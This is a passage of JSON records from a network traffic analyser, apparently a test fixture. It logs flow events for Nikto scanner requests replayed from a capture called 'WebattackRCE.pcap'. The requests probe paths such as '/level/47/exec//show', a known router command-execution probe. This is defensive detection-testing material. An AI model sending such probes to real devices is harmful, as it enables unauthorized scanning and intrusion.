Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277631,"pkt":"AAAAAAAAAAAAAAAACABFAADIlpVAAEAGpZh\/AAABfwAAAcZAH5Cryq5teKvsJoAYAED+vAAAAQEICp1m\/qedZv6nR0VUIC9sZXZlbC80Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTQpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277633,"pkt":"AAAAAAAAAAAAAAAACABFAADIENVAAEAGK1l\/AAABfwAAAcZCH5APvynUeLRgIoAYAED+vAAAAQEICp1m\/qmdZv6oR0VUIC9sZXZlbC80OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277637,"pkt":"AAAAAAAAAAAAAAAACABFAADIJlxAAEAGFdJ\/AAABfwAAAcZEH5CFHB9c3vOX2IAYAED+vAAAAQEICp1m\/q2dZv6tR0VUIC9sZXZlbC80OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277639,"pkt":"AAAAAAAAAAAAAAAACABFAADIZI9AAEAG155\/AAABfwAAAcZGH5DAl12NotXkTIAYAED+vAAAAQEICp1m\/q+dZv6vR0VUIC9sZXZlbC81MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277642,"pkt":"AAAAAAAAAAAAAAAACABFAADIuMhAAEAGg2V\/AAABfwAAAcZIH5DuPYHFtiFXooAYAED+vAAAAQEICp1m\/rKdZv6yR0VUIC9sZXZlbC81MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277644,"pkt":"AAAAAAAAAAAAAAAACABFAADIp2FAAEAGlMx\/AAABfwAAAcZKH5BZVp5d6Tz88YAYAED+vAAAAQEICp1m\/rSdZv60R0VUIC9sZXZlbC81Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277646,"pkt":"AAAAAAAAAAAAAAAACABFAADIRMlAAEAG92R\/AAABfwAAAcZMH5Ck2n3FkPG1\/IAYAED+vAAAAQEICp1m\/radZv62R0VUIC9sZXZlbC81My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277648,"pkt":"AAAAAAAAAAAAAAAACABFAADIfG5AAEAGv79\/AAABfwAAAcZOH5Bk90VplsnARIAYAED+vAAAAQEICp1m\/ridZv64R0VUIC9sZXZlbC81NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277650,"pkt":"AAAAAAAAAAAAAAAACABFAADIGk5AAEAGIeB\/AAABfwAAAcZQH5A3JSNJK84\/noAYAED+vAAAAQEICp1m\/rmdZv65R0VUIC9sZXZlbC81NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277657,"pkt":"AAAAAAAAAAAAAAAACABFAADIqGlAAEAGk8R\/AAABfwAAAcZSH5BRNZFiv2NJXIAYAED+vAAAAQEICp1m\/sGdZv7AR0VUIC9sZXZlbC81Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277658,"pkt":"AAAAAAAAAAAAAAAACABFAADIKidAAEAGEgd\/AAABfwAAAcZUH5DRhBMk1ziDVIAYAED+vAAAAQEICp1m\/sKdZv7CR0VUIC9sZXZlbC81Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDQpDQoNCg=="} 